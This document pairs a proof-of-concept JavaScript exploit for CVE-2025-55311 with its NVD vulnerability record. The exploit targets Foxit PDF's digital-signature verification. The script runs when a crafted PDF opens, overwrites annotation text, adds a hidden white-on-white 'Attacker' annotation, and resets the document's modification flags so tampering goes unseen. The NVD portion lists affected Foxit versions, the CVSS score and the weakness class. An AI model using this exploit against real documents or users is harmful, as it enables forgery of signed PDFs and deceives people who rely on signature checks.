CVE-2025-55311

// CVE-2025-55311 PoC - Foxit PDF Signature Bypass via JavaScript // This PoC demonstrates how JavaScript can modify annotations and clear document modification status function exploitSignatureVerification() { try { // Step 1: Get all annotations in the document var annots = this.getAnnots(); if (annots && annots.length > 0) { console.println("Found " + annots.length + " annotations"); // Step 2: Modify existing annotation content for (var i = 0; i < annots.length; i++) { var annot = annots[i]; if (annot.type === "Text" || annot.type === "FreeText") { // Modify annotation contents annot.setContents("Malicious content injected by attacker"); annot.setProps({ contents: "Tampered annotation content", modificationDate: "", creationDate: "" }); console.println("Annotation " + i + " modified successfully"); } } } // Step 3: Add malicious annotation var pageNum = 0; var annotRect = { left: 50, top: 700, right: 200, bottom: 750 }; this.addAnnot({ page: pageNum, type: "FreeText", rect: annotRect, contents: "Hidden malicious annotation - document integrity compromised", author: "Attacker", fillColor: [255, 255, 255], strokeColor: [255, 255, 255] }); // Step 4: Clear document modification status // This is the critical step that bypasses signature verification if (typeof this.clearDoc === "function") { this.clearDoc(); console.println("Document modification status cleared"); } // Alternative method to reset dirty flag try { this.dirty = false; this.modified = false; } catch (e) { console.println("Flag reset method: " + e.message); } console.println("Exploit completed - signature verification bypassed"); } catch (e) { console.println("Exploit error: " + e.message); } } // Execute the exploit when document opens exploitSignatureVerification();

{"cve": {"id": "CVE-2025-55311", "sourceIdentifier": "[email protected]", "published": "2025-12-11T16:16:25.507", "lastModified": "2026-01-07T15:15:45.750", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. A crafted PDF can use JavaScript to alter annotation content and subsequently clear the file's modification status via JavaScript interfaces. This circumvents digital signature verification by hiding document modifications, allowing an attacker to mislead users about the document's integrity and compromise the trustworthiness of signed PDFs."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-347"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.1.7.63027", "matchCriteriaId": "D4EDFD47-2811-431C-8535-91EE4090A9A8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.1.0.55583", "versionEndIncluding": "2023.3.0.63083", "matchCriteriaId": "D8785CCE-C44C-4908-9133-13A580D5BECB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.1.0.63682", "versionEndIncluding": "2024.4.1.66479", "matchCriteriaId": "CF043D20-0E28-481C-8756-D1301FAE67D2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:2025.1.0.66692:*:*:*:*:*:*:*", "matchCriteriaId": "E0FF839F-37E7-4AFA-85B1-FC98366B14E8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_reader:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025.1.0.66692", "matchCriteriaId": "6520861F-4458-4E63-AA62-CF3096AE0C41"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.1.7.23637", "matchCriteriaId": "F900FF8A-7BFA-442E-BC8C-5A3717961DD5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.1.0.15510", "versionEndIncluding": "2023.3.0.23028", "matchCriteriaId": "0C75FEE6-54F3-49C6-BAEA-A09D23BE5D64"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.1.0.23997", "versionEndIncluding": "2024.4.1.27687", "matchCriteriaId": "2C06BC41-9831-4AE3-B10B-3FC313D01580"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:2025.1.0.27937:*:*:*:*:*:*:*", "matchCriteriaId": "9FDC914F-B999-4233-8BEA-CA20B1F0D9D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_reader:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025.1.0.27937", "matchCriteriaId": "DB827B5A-9957-43B2-A633-EF5442A2EF35"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.foxit.com/support/security-bulletins.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}